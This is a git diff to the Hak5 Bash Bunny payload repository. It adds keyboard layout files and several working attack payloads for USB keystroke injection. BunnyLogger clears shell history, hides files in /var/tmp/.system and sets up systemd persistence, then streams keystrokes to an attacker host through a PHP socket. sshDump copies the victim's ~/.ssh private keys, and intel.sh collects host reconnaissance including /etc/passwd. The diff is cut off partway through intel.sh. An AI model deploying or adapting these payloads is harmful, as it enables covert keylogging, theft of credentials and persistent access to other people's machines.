diff --git a/README.md b/README.md index ecfd2491..257d1f1b 100644 --- a/README.md +++ b/README.md @@ -6,14 +6,14 @@ This repository contains payloads and extensions for the Hak5 Bash Bunny. Commun By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. - [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5") -- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny "Documentation") -- [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Forums") +- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation") +- [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums") - Discord: [https://hak5.org/discord](https://hak5.org/discord) ![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg) ## Documentation -Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). +Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). ## Disclaimer Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. diff --git a/languages/hu.json b/languages/hu.json new file mode 100644 index 00000000..71cae1fd --- /dev/null +++ b/languages/hu.json @@ -0,0 +1,187 @@ +{ + "__comment":"All numbers here are in hex format and 0x is ignored.", + "__comment":" ", + "__comment":"This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment":" See section 10 Keyboard/Keypad Page (0x07)", + "__comment":" of document USB HID Usage Tables Version 1.12.", + "__comment":" ", + "__comment":"Definition of these 3 bytes can be found", + "__comment":" in section B.1 Protocol 1 (Keyboard)", + "__comment":" of document Device Class Definition for HID Version 1.11", + "__comment":" - byte 1: Modifier keys", + "__comment":" - byte 2: Reserved", + "__comment":" - byte 3: Keycode 1", + "__comment":" ", + "__comment":"Both documents can be obtained from link here", + "__comment":" http://www.usb.org/developers/hidpage/", + "__comment":" ", + "__comment":" Hungarian QWERTZ language made by Skeleton022", + "__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ", + "a":"00,00,04", + "b":"00,00,05", + "c":"00,00,06", + "d":"00,00,07", + "e":"00,00,08", + "f":"00,00,09", + "g":"00,00,0a", + "h":"00,00,0b", + "i":"00,00,0c", + "j":"00,00,0d", + "k":"00,00,0e", + "l":"00,00,0f", + "m":"00,00,10", + "n":"00,00,11", + "o":"00,00,12", + "p":"00,00,13", + "q":"00,00,14", + "r":"00,00,15", + "s":"00,00,16", + "t":"00,00,17", + "u":"00,00,18", + "v":"00,00,19", + "w":"00,00,1a", + "x":"00,00,1b", + "z":"00,00,1c", + "y":"00,00,1d", + "1":"00,00,1e", + "2":"00,00,1f", + "3":"00,00,20", + "4":"00,00,21", + "5":"00,00,22", + "6":"00,00,23", + "7":"00,00,24", + "8":"00,00,25", + "9":"00,00,26", + "ö":"00,00,27", + "ENTER":"00,00,28", + "ESC":"00,00,29", + "ESCAPE":"00,00,29", + "TAB":"00,00,2b", + " ":"00,00,2c", + "SPACE":"00,00,2c", + "ü":"00,00,2d", + "ó":"00,00,2e", + "ő":"00,00,2f", + "ú":"00,00,30", + "ű":"00,00,31", + "é":"00,00,33", + "á":"00,00,34", + "0":"00,00,35", + ",":"00,00,36", + ".":"00,00,37", + "-":"00,00,38", + "CAPSLOCK":"00,00,39", + "F1":"00,00,3a", + "F2":"00,00,3b", + "F3":"00,00,3c", + "F4":"00,00,3d", + "F5":"00,00,3e", + "F6":"00,00,3f", + "F7":"00,00,40", + "F8":"00,00,41", + "F9":"00,00,42", + "F10":"00,00,43", + "F11":"00,00,44", + "F12":"00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK":"00,00,47", + "BREAK":"00,00,48", + "PAUSE":"00,00,48", + "INSERT":"00,00,49", + "HOME":"00,00,4a", + "PAGEUP":"00,00,4b", + "DEL":"00,00,4c", + "DELETE":"00,00,4c", + "END":"00,00,4d", + "PAGEDOWN":"00,00,4e", + "RIGHT":"00,00,4f", + "RIGHTARROW":"00,00,4f", + "LEFT":"00,00,50", + "LEFTARROW":"00,00,50", + "DOWN":"00,00,51", + "DOWNARROW":"00,00,51", + "UP":"00,00,52", + "UPARROW":"00,00,52", + "í":"00,00,64", + "APP":"00,00,65", + "MENU":"00,00,65", + "ALT-TAB":"00,00,71", + "CONTROL":"01,00,00", + "CTRL":"01,00,00", + "SHIFT":"02,00,00", + "A":"02,00,04", + "B":"02,00,05", + "C":"02,00,06", + "D":"02,00,07", + "E":"02,00,08", + "F":"02,00,09", + "G":"02,00,0a", + "H":"02,00,0b", + "I":"02,00,0c", + "J":"02,00,0d", + "K":"02,00,0e", + "L":"02,00,0f", + "M":"02,00,10", + "N":"02,00,11", + "O":"02,00,12", + "P":"02,00,13", + "Q":"02,00,14", + "R":"02,00,15", + "S":"02,00,16", + "T":"02,00,17", + "U":"02,00,18", + "V":"02,00,19", + "W":"02,00,1a", + "X":"02,00,1b", + "Z":"02,00,1c", + "Y":"02,00,1d", + "'":"02,00,1e", + "\"":"02,00,1f", + "+":"02,00,20", + "!":"02,00,21", + "%":"02,00,22", + "/":"02,00,23", + "=":"02,00,24", + "(":"02,00,25", + ")":"02,00,26", + "Ö":"02,00,27", + "Ü":"02,00,2d", + "Ó":"02,00,2e", + "Ő":"02,00,2f", + "Ú":"02,00,30", + "Ű":"02,00,31", + "É":"02,00,33", + "Á":"02,00,34", + "?":"02,00,36", + ":":"02,00,37", + "_":"02,00,38", + "Í":"02,00,64", + "CTRL-SHIFT":"03,00,00", + "ALT":"04,00,00", + "CTRL-ALT":"05,00,00", + "ALT-SHIFT":"06,00,00", + "COMMAND":"08,00,00", + "GUI":"08,00,00", + "WINDOWS":"08,00,00", + "COMMAND-OPTION":"12,00,00", + "COMMAND-CTRL-SHIFT":"12,00,00", + "COMMAND-CTRL":"12,00,00", + "COMMAND-OPTION-SHIFT'":"12,00,00", + "{":"40,00,05", + "&":"40,00,06", + "[":"40,00,09", + "]":"40,00,0a", + "}":"40,00,11", + "\\":"40,00,14", + "@":"40,00,19", + "|":"40,00,1a", + "#":"40,00,1b", + ">":"40,00,1d", + "~":"40,00,1e", + "^":"40,00,20", + "`":"40,00,24", + "$":"40,00,33", + ";":"40,00,36", + "*":"40,00,38", + "<":"40,00,64" +} diff --git a/languages/jp.json b/languages/jp.json new file mode 100644 index 00000000..9c3506fa --- /dev/null +++ b/languages/jp.json @@ -0,0 +1,172 @@ +{ + "__comment": "All numbers here are in hex format and 0x is ignored.", + "__comment": " ", + "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment": " See section 10 Keyboard/Keypad Page (0x07)", + "__comment": " of document USB HID Usage Tables Version 1.12.", + "__comment": " ", + "__comment": "Definition of these 3 bytes can be found", + "__comment": " in section B.1 Protocol 1 (Keyboard)", + "__comment": " of document Device Class Definition for HID Version 1.11", + "__comment": " - byte 1: Modifier keys", + "__comment": " - byte 2: Reserved", + "__comment": " - byte 3: Keycode 1", + "__comment": " ", + "__comment": "Both documents can be obtained from link here", + "__comment": " http://www.usb.org/developers/hidpage/", + "__comment": " ", + "__comment": "A = LeftShift + a, { = LeftShift + [", + "__comment": " ", + "CTRL": "01,00,00", + "CONTROL": "01,00,00", + "SHIFT": "02,00,00", + "ALT": "04,00,00", + "GUI": "08,00,00", + "WINDOWS": "08,00,00", + "CTRL-ALT": "05,00,00", + "CTRL-SHIFT": "03,00,00", + "ALT-SHIFT": "06,00,00", + "__comment": "Below 5 key combinations are for Mac OSX", + "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal", + "COMMAND": "08,00,00", + "COMMAND-CTRL": "09,00,00", + "COMMAND-CTRL-SHIFT": "0B,00,00", + "COMMAND-OPTION": "0C,00,00", + "COMMAND-OPTION-SHIFT": "0E,00,00", + "a": "00,00,04", + "A": "02,00,04", + "b": "00,00,05", + "B": "02,00,05", + "c": "00,00,06", + "C": "02,00,06", + "d": "00,00,07", + "D": "02,00,07", + "e": "00,00,08", + "E": "02,00,08", + "f": "00,00,09", + "F": "02,00,09", + "g": "00,00,0a", + "G": "02,00,0a", + "h": "00,00,0b", + "H": "02,00,0b", + "i": "00,00,0c", + "I": "02,00,0c", + "j": "00,00,0d", + "J": "02,00,0d", + "k": "00,00,0e", + "K": "02,00,0e", + "l": "00,00,0f", + "L": "02,00,0f", + "m": "00,00,10", + "M": "02,00,10", + "n": "00,00,11", + "N": "02,00,11", + "o": "00,00,12", + "O": "02,00,12", + "p": "00,00,13", + "P": "02,00,13", + "q": "00,00,14", + "Q": "02,00,14", + "r": "00,00,15", + "R": "02,00,15", + "s": "00,00,16", + "S": "02,00,16", + "t": "00,00,17", + "T": "02,00,17", + "u": "00,00,18", + "U": "02,00,18", + "v": "00,00,19", + "V": "02,00,19", + "w": "00,00,1a", + "W": "02,00,1a", + "x": "00,00,1b", + "X": "02,00,1b", + "y": "00,00,1c", + "Y": "02,00,1c", + "z": "00,00,1d", + "Z": "02,00,1d", + "1": "00,00,1e", + "!": "02,00,1e", + "2": "00,00,1f", + "\"": "02,00,1f", + "3": "00,00,20", + "#": "02,00,20", + "4": "00,00,21", + "$": "02,00,21", + "5": "00,00,22", + "%": "02,00,22", + "6": "00,00,23", + "&": "02,00,23", + "7": "00,00,24", + "'": "02,00,24", + "8": "00,00,25", + "(": "02,00,25", + "9": "00,00,26", + ")": "02,00,26", + "0": "00,00,27", + "ENTER": "00,00,28", + "ESC": "00,00,29", + "ESCAPE": "00,00,29", + "BACKSPACE": "00,00,2a", + "TAB": "00,00,2b", + "ALT-TAB": "04,00,2b", + "SPACE": "00,00,2c", + " ": "00,00,2c", + "-": "00,00,2d", + "=": "02,00,2d", + "^": "00,00,2e", + "~": "02,00,2e", + "@": "00,00,2f", + "`": "02,00,2f", + "[": "00,00,30", + "{": "02,00,30", + "\\": "00,00,31", + "|": "02,00,31", + "]": "00,00,32", + "}": "02,00,32", + ";": "00,00,33", + "+": "02,00,33", + ":": "00,00,34", + "*": "02,00,34", + ",": "00,00,36", + "<": "02,00,36", + ".": "00,00,37", + ">": "02,00,37", + "/": "00,00,38", + "?": "02,00,38", + "CAPSLOCK": "00,00,39", + "F1": "00,00,3a", + "F2": "00,00,3b", + "F3": "00,00,3c", + "F4": "00,00,3d", + "F5": "00,00,3e", + "F6": "00,00,3f", + "F7": "00,00,40", + "F8": "00,00,41", + "F9": "00,00,42", + "F10": "00,00,43", + "F11": "00,00,44", + "F12": "00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK": "00,00,47", + "PAUSE": "00,00,48", + "BREAK": "00,00,48", + "INSERT": "00,00,49", + "HOME": "00,00,4a", + "PAGEUP": "00,00,4b", + "DELETE": "00,00,4c", + "DEL": "00,00,4c", + "END": "00,00,4d", + "PAGEDOWN": "00,00,4e", + "RIGHTARROW": "00,00,4f", + "RIGHT": "00,00,4f", + "LEFTARROW": "00,00,50", + "LEFT": "00,00,50", + "DOWNARROW": "00,00,51", + "DOWN": "00,00,51", + "UPARROW": "00,00,52", + "UP": "00,00,52", + "NUMLOCK": "00,00,53", + "MENU": "00,00,65", + "APP": "00,00,65" +} diff --git a/languages/tr.json b/languages/tr.json new file mode 100644 index 00000000..77c63de4 --- /dev/null +++ b/languages/tr.json @@ -0,0 +1,173 @@ +{ + "__comment": "All numbers here are in hex format and 0x is ignored.", + "__comment": " ", + "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment": " See section 10 Keyboard/Keypad Page (0x07)", + "__comment": " of document USB HID Usage Tables Version 1.12.", + "__comment": " ", + "__comment": "Definition of these 3 bytes can be found", + "__comment": " in section B.1 Protocol 1 (Keyboard)", + "__comment": " of document Device Class Definition for HID Version 1.11", + "__comment": " - byte 1: Modifier keys", + "__comment": " - byte 2: Reserved", + "__comment": " - byte 3: Keycode 1", + "__comment": " ", + "__comment": "Both documents can be obtained from link here", + "__comment": " http://www.usb.org/developers/hidpage/", + "__comment": " ", + "__comment": "A = LeftShift + a, { = LeftShift + [", + "__comment": " ", + "CTRL": "01,00,00", + "CONTROL": "01,00,00", + "SHIFT": "02,00,00", + "ALT": "04,00,00", + "GUI": "08,00,00", + "WINDOWS": "08,00,00", + "CTRL-ALT": "05,00,00", + "CTRL-SHIFT": "03,00,00", + "ALT-SHIFT": "06,00,00", + "__comment": "Below 5 key combinations are for Mac OSX", + "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal", + "COMMAND": "08,00,00", + "COMMAND-CTRL": "09,00,00", + "COMMAND-CTRL-SHIFT": "0B,00,00", + "COMMAND-OPTION": "0C,00,00", + "COMMAND-OPTION-SHIFT": "0E,00,00", + "a": "00,00,04", + "A": "02,00,04", + "b": "00,00,05", + "B": "02,00,05", + "c": "00,00,06", + "C": "02,00,06", + "d": "00,00,07", + "D": "02,00,07", + "e": "00,00,08", + "E": "02,00,08", + "f": "00,00,09", + "F": "02,00,09", + "g": "00,00,0a", + "G": "02,00,0a", + "h": "00,00,0b", + "H": "02,00,0b", + "i": "00,00,34", + "I": "02,00,0c", + "j": "00,00,0d", + "J": "02,00,0d", + "k": "00,00,0e", + "K": "02,00,0e", + "l": "00,00,0f", + "L": "02,00,0f", + "m": "00,00,10", + "M": "02,00,10", + "n": "00,00,11", + "N": "02,00,11", + "o": "00,00,12", + "O": "02,00,12", + "p": "00,00,13", + "P": "02,00,13", + "q": "00,00,14", + "Q": "02,00,14", + "r": "00,00,15", + "R": "02,00,15", + "s": "00,00,16", + "S": "02,00,16", + "t": "00,00,17", + "T": "02,00,17", + "u": "00,00,18", + "U": "02,00,18", + "v": "00,00,19", + "V": "02,00,19", + "w": "00,00,1a", + "W": "02,00,1a", + "x": "00,00,1b", + "X": "02,00,1b", + "y": "00,00,1c", + "Y": "02,00,1c", + "z": "00,00,1d", + "Z": "02,00,1d", + "1": "00,00,1e", + "!": "02,00,1e", + "2": "00,00,1f", + "@": "40,00,14", + "3": "00,00,20", + "#": "40,00,20", + "4": "00,00,21", + "$": "40,00,21", + "5": "00,00,22", + "%": "02,00,22", + "6": "00,00,23", + "^": "02,00,20", + "7": "00,00,24", + "&": "02,00,23", + "8": "00,00,25", + "*": "00,00,2d", + "9": "00,00,26", + "(": "02,00,25", + "0": "00,00,27", + ")": "02,00,26", + "ENTER": "00,00,28", + "ESC": "00,00,29", + "ESCAPE": "00,00,29", + "BACKSPACE": "00,00,2a", + "TAB": "00,00,2b", + "ALT-TAB": "04,00,2b", + "SPACE": "00,00,2c", + " ": "00,00,2c", + "-": "00,00,2e", + "_": "02,00,2e", + "=": "02,00,27", + "+": "02,00,21", + "[": "40,00,25", + "{": "40,00,24", + "]": "40,00,26", + "}": "40,00,27", + "\\": "40,00,2d", + "|": "40,00,2e", + ";": "02,00,31", + ":": "02,00,38", + "'": "02,00,1f", + "\"": "00,00,35", + "`": "40,00,31", + "~": "40,00,30", + ",": "00,00,31", + "<": "40,00,35", + ".": "00,00,38", + ">": "40,00,1e", + "/": "02,00,24", + "?": "02,00,2d", + "CAPSLOCK": "00,00,39", + "F1": "00,00,3a", + "F2": "00,00,3b", + "F3": "00,00,3c", + "F4": "00,00,3d", + "F5": "00,00,3e", + "F6": "00,00,3f", + "F7": "00,00,40", + "F8": "00,00,41", + "F9": "00,00,42", + "F10": "00,00,43", + "F11": "00,00,44", + "F12": "00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK": "00,00,47", + "PAUSE": "00,00,48", + "BREAK": "00,00,48", + "INSERT": "00,00,49", + "HOME": "00,00,4a", + "PAGEUP": "00,00,4b", + "DELETE": "00,00,4c", + "DEL": "00,00,4c", + "END": "00,00,4d", + "PAGEDOWN": "00,00,4e", + "RIGHTARROW": "00,00,4f", + "RIGHT": "00,00,4f", + "LEFTARROW": "00,00,50", + "LEFT": "00,00,50", + "DOWNARROW": "00,00,51", + "DOWN": "00,00,51", + "UPARROW": "00,00,52", + "UP": "00,00,52", + "NUMLOCK": "00,00,53", + "MENU": "00,00,65", + "APP": "00,00,65" +} diff --git a/payloads/library/credentials/BunnyLogger/README.md b/payloads/library/credentials/BunnyLogger/README.md new file mode 100644 index 00000000..7c19270f --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/README.md @@ -0,0 +1,62 @@ +## About: +* Title: BunnyLogger +* Description: Key logger which sends each and every key stroke of target remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Credentials +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker. + +### Features: +* Live keystroke capturing. +* Detailed key logs. +* Persistent +* Autostart payload on boot. + +### Workflow: +* Encoding payload and injecting on target's system. +* Checks whether internet is connected to the target system. +* If internet is connected then it sends raw keystrokes to attacker. +* Attacker processes raw keystrokes. + +### Changes to be made in payload.sh: +* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`. +* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payload/switch1/ | +| payload.sh | /payload/ | +| xinput | /tools/ | + +### Usage: +1. Encode payload.txt and inject into target's system. +2. Start netcat listner on attacking system: + +* `nc -lvp > ` use this command to create new logfile with raw keystrokes. +* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile. +3. Process raw keystrokes using BunnyLoggerDecoder utility: +``` +./bunnyLoggerDecoder +bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger. + +Usage: +Decode captured log: [./bunnyLoggerDecoder -f -m -o ] + +Options: +-f Specify Log file. +-m Select Mode(normal|informative) +-o Specify Output file. +-h For this banner. +``` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder new file mode 100644 index 00000000..c4aa994d --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder @@ -0,0 +1,50 @@ +usage () { + echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n" + echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f -m -o ]"; + echo -e "\nOptions:" + echo -e "-f\tSpecify Log file." + echo -e "-m\tSelect Mode(normal|informative)" + echo -e "-o\tSpecify Output file." + echo -e "-h\tFor this banner." +} +while getopts o:m:f:h: flag +do + case "${flag}" in + o) output=$OPTARG ;; + m) mode=$OPTARG ;; + f) filename=$OPTARG ;; + h) help=$OPTARG ;; + *) + usage + exit 1 + esac +done + +if [ -z "$output" ] && [ -z "$filename" ]; then + usage + exit 1 +fi +if [ -z "$filename" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2 + exit 1 +fi +if [ -z "$output" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ -z "$mode" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then + echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" == "normal" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output + exit 1 +fi +if [ "$mode" == "informative" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output + exit 1 +fi diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh new file mode 100644 index 00000000..90d1ea36 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/payload.sh @@ -0,0 +1,24 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/tools/xinput /var/tmp/.system/ +echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys +chmod +x /var/tmp/.system/sys +chmod +x /var/tmp/.system/xinput +echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +chmod +x /var/tmp/.system/reboot +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +systemctl --user enable --now reboot.service +systemctl --user start --now reboot.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/credentials/BunnyLogger/payload.txt b/payloads/library/credentials/BunnyLogger/payload.txt new file mode 100644 index 00000000..f9c67969 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/payload.txt @@ -0,0 +1,56 @@ +# Title: BunnyLogger +# Description: Key logger which sends each and every key stroke of target remotely/locally. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 2000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/credentials/BunnyLogger/xinput b/payloads/library/credentials/BunnyLogger/xinput new file mode 100644 index 00000000..b9a54988 Binary files /dev/null and b/payloads/library/credentials/BunnyLogger/xinput differ diff --git a/payloads/library/credentials/sshDump/payload.txt b/payloads/library/credentials/sshDump/payload.txt new file mode 100644 index 00000000..01ee9ad0 --- /dev/null +++ b/payloads/library/credentials/sshDump/payload.txt @@ -0,0 +1,49 @@ +# Title: sshDump +# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: GNU/Linux. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [Looting] +Q STRING cp -r '~/.ssh' '$mntt/loot/SSH' +Q ENTER +Q DELAY 2000 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/intel/README.md b/payloads/library/exfiltration/intel/README.md new file mode 100644 index 00000000..a69f7558 --- /dev/null +++ b/payloads/library/exfiltration/intel/README.md @@ -0,0 +1,24 @@ +# intel(intelligence) + +## About: +* Title: intel +* Description: intel(intelligence) payload collects detailed information of victims machine. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltration +* Target: GNU/Linux +* Attackmodes: HID, Storage + +## intel(intelligence) payload collects detailed information of victims machine. + + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Transfering payload script and executing it. +5. Deleting script from victims system. +6. Unmounting BashBunny. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/exfiltration/intel/intel.sh b/payloads/library/exfiltration/intel/intel.sh new file mode 100644 index 00000000..a3cec365 --- /dev/null +++ b/payloads/library/exfiltration/intel/intel.sh @@ -0,0 +1,67 @@ +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +echo -e "*******************************************" >> $mntt/loot/intel +echo "Network Schema:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +nmap -sV localhost >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "Network Interfaces:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +ifconfig >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +ip addr >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +iwconfig >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo Storage Info: >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +findmnt >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +cat /etc/fstab >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "USB Info:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +lsusb -v >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "PCI Info:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +lspci -vvv >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "CPU Info:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +lscpu >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "Systemd services:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +systemctl list-units >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo User/groups: >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +id >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +cat /etc/passwd >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "Installed packages:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm 